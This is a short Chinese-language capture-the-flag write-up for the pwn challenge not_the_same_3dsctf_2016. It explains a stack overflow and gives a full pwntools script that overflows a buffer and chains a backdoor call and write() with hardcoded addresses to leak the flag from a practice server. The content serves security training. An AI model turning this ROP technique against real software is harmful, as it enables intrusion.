其他分享
首页 > 其他分享> > pwn | not_the_same_3dsctf_2016

pwn | not_the_same_3dsctf_2016

作者:互联网

not_the_same_3dsctf_2016

栈溢出ret2text rop

main
image

存在后门:
image

将文件写进bss段的全局变量

控制一下执行流程ret2write然后输出这个变量就行了
exp:

from pwn import *
import time 

context.log_level = 'debug'

sh = remote('node4.buuoj.cn', 26446)

p_backdoor = 0x080489A0

p_fprintf = 0x08085950
p_write = 0x0806E270

p_exit = 0x0804E660

p_flag = 0x080ECA2D
# sh.recv()


payload = 0x2d * b'm' + p32(p_backdoor) + p32(p_write) + p32(p_exit)
payload += p32(1) + p32(p_flag) + p32(45)

sh.sendline(payload)

sh.interactive()

sh.close()

标签:3dsctf,same,write,p32,sh,pwn,2016,payload
来源: https://www.cnblogs.com/Mz1-rc/p/15569172.html